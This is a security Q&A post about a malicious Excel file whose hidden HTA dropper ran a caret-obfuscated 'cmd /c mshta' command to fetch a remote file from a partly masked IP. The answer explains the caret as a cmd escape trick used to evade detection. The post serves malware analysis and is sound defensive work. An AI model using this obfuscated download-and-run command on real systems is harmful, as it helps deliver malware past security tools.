# Malware dropper uses "^" character in syntax of cmd.exe before calling mshta.exe to download file?

Tags: malware, antivirus, antimalware, malware-analysis

I found a malicious Excel file that was using an embedded HTA program as its dropper to download a powershell program from a malicious IP. The dropper was on a hidden sheet in the file. After reviewing the output in the sandbox I found that the syntax in the command line made use of the `^` character. Why?

```
C:\Windows\SYSTEM32\cmd.exe
cmd /c m^sh^t^a h^tt^p^:/^/8x.xxx.xx.xxx/pp/aa.html
```

Then the following command was :

```
mshta  hxxp://8x.xxx.xx.xxx/pp/aa.html
```

So, it was using HTA to call mshta.exe but why that syntax in the commandline? Is that valid, a sandbox error, or an attempt to get around security monitoring tools/antivirus software?

Answer (score 2):

That is likely an attempt to evade security software and/or signature based detection. The caret character (`^`) is used as an escape character in batch scripts/cmd. When used before a normal character, it is effectively just ignored. This is a [common obfuscation technique](https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf#page=11) used by windows malware.